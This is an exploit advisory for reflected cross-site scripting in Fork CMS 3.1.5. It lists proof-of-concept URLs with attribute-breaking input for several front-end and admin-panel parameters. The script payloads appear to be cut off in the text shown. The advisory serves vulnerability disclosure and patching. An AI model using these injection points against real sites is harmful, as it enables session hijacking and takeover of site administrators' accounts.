############################################################################################################### # Exploit Title: Fork CMS v.3.1.5 - Reflected Cross-Site Scripting ( XSS ) Vulnerability # Script Page : http://www.fork-cms.com/ # Date: 13-12-2011 # Author : RandomStorm - http://www.randomstorm.com # Avram Marius Gabriel (d3v1l) # Tested on: Windows XP & Vista (IE9) ############################################################################################################### # Cross-Site Scripting (XSS) on Front Site # POC: # http://site.com/blog/detail/article?utm_source=feed&utm_medium=rss"> # http://site.com/search?form=search&q_widget=&submit="> # http://site.com/search?form=search&q_widget="> # http://site.com/search?form="> ################################################################################################################ # Cross-Site Scripting (XSS) on Admin Panel # POC: # http://site.com/private/en/users/edit?id=1"> # http://site.com/private/en/pages/edit?token=true&id=1"> # http://site.com/private/en/mailmotor/settings?token="> ############################################################################################################### # About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website. ################################################################################################################